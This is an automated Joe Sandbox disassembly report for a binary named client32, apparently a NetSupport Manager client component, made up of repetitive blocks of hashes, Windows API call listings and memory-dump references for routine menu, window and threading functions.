                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Load$ClassCursorErrorIconLastRegister
                                                                                                                                                                                                    • String ID: 0$Zv
                                                                                                                                                                                                    • API String ID: 1253014879-2782671768
                                                                                                                                                                                                    • Opcode ID: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
                                                                                                                                                                                                    • Instruction ID: 2890e39c8948161dcf3a4c2706354c0f925fee5346d150246dd1548a136c71b7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0018074D0131AABDB00EFE0C859B9DFBB4AB04308F508529F614BA284E7B511048B96
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EFD), ref: 1100334D
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003373
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110033A2
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                                                                                                    • Instruction ID: 58cfccb6135285d2752e7502dd052a47240bf2dd06342519f2e5277968a08211
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79F05C3EF0062663C22352263C49F4FB7684BC1AB8F110071F910FA744FE11A00041FA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF1), ref: 1100343D
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11003463
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003492
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
                                                                                                                                                                                                    • Instruction ID: 2e6e1d300c4266612bf4869b02bb9134ae399a8ea59526bbeac45393f23ca2b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecf5237d3c1ec1f70e787f245b5d29412aff373a2d4b3b6da9ac5f410c095a34
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0553EF4026A63C61362263C49F8FB6688BC1AA8F120071FA10BE684FD20B00041FB
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                                                                                    • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                                                                                                                                    • API String ID: 3442037557-1320232752
                                                                                                                                                                                                    • Opcode ID: 945b61195795daed44a5419f1403211bb583dbcc7a60dd783a52273aacfb2d47
                                                                                                                                                                                                    • Instruction ID: 4ae991e8b238cca573096b2fcc20bd372ce19027575c055cb203384996eb618e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 945b61195795daed44a5419f1403211bb583dbcc7a60dd783a52273aacfb2d47
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E316D75A0062B9FDB21CF94CC41BEAB7B4EF09315F0044F5E919AB244EB74EA85CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(00000008,?), ref: 1107D876
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 1107D8AA
                                                                                                                                                                                                      • Part of subcall function 110772A0: GetDlgItem.USER32(?,?), ref: 110772DB
                                                                                                                                                                                                      • Part of subcall function 110772A0: IsWindowVisible.USER32(00000000), ref: 110772F7
                                                                                                                                                                                                      • Part of subcall function 110772A0: ShowWindow.USER32(00000000,00000000), ref: 11077317
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 1107D92C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1107D917
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1107D912
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$InvalidateRectShowVisible
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3890985837-2830328467
                                                                                                                                                                                                    • Opcode ID: cb7a73266c2e43f887cb54da0e730aa52047e3cb9c3499e81ef2b8ed5b8fb976
                                                                                                                                                                                                    • Instruction ID: ac581610526f9a969a1a3a3b50c1caa9765caa2c3588efba05e4f1fef3c58298
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb7a73266c2e43f887cb54da0e730aa52047e3cb9c3499e81ef2b8ed5b8fb976
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED5119B5E00705AFD710CF58C881F6EBBF4FB48314F208559EA6A9B291D770E840CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1106D299
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF
                                                                                                                                                                                                      • Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?,?,?,?), ref: 1110C8D4
                                                                                                                                                                                                      • Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterEventwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                                                                                                                    • API String ID: 3430577181-2624497655
                                                                                                                                                                                                    • Opcode ID: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
                                                                                                                                                                                                    • Instruction ID: 04573714079795333ec223b70536839c78a5a0195139b0015b045f9e3d8978cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD318975E00296EFDB25CF50C880F9EB3B8AB45318F0085DAE54A6B241DB70EAC5CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?,?,?,?), ref: 1110C8D4
                                                                                                                                                                                                      • Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1106D299
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterEventwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
                                                                                                                                                                                                    • API String ID: 3430577181-2624497655
                                                                                                                                                                                                    • Opcode ID: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
                                                                                                                                                                                                    • Instruction ID: 536c81e74eca5bf7a4e2791cfcdf9f566333e3a1added10bfa629768b284d793
                                                                                                                                                                                                    • Opcode Fuzzy Hash: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21317A75E00296EFD725CF90C884F9EF7F9AB45314F00819AD54A9B241DB70E9C1CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000475), ref: 110CB5E0
                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 110CB5E7
                                                                                                                                                                                                    • GetDlgItemTextA.USER32(?,00000475,00000000,00000001), ref: 110CB605
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 110CB635
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110CB630
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorItemLastText$ExitFreeHeapLengthMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 190121423-3415836059
                                                                                                                                                                                                    • Opcode ID: b6efca7ef3df6be20303fc537e90392a36bcdcaaf6110f94fbf8e047b8341ade
                                                                                                                                                                                                    • Instruction ID: 0eb6a058222da800fe12992da5caab4c5bd0fe2efc99a90d0edb73e055c5ac9e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6efca7ef3df6be20303fc537e90392a36bcdcaaf6110f94fbf8e047b8341ade
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA01AD7AA00517BBD740DB99DC88D9FF3ADEF892583148120FA2887200DB34F9158BE2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(111E97E4), ref: 110774E5
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 11077509
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 11077530
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 11077557
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
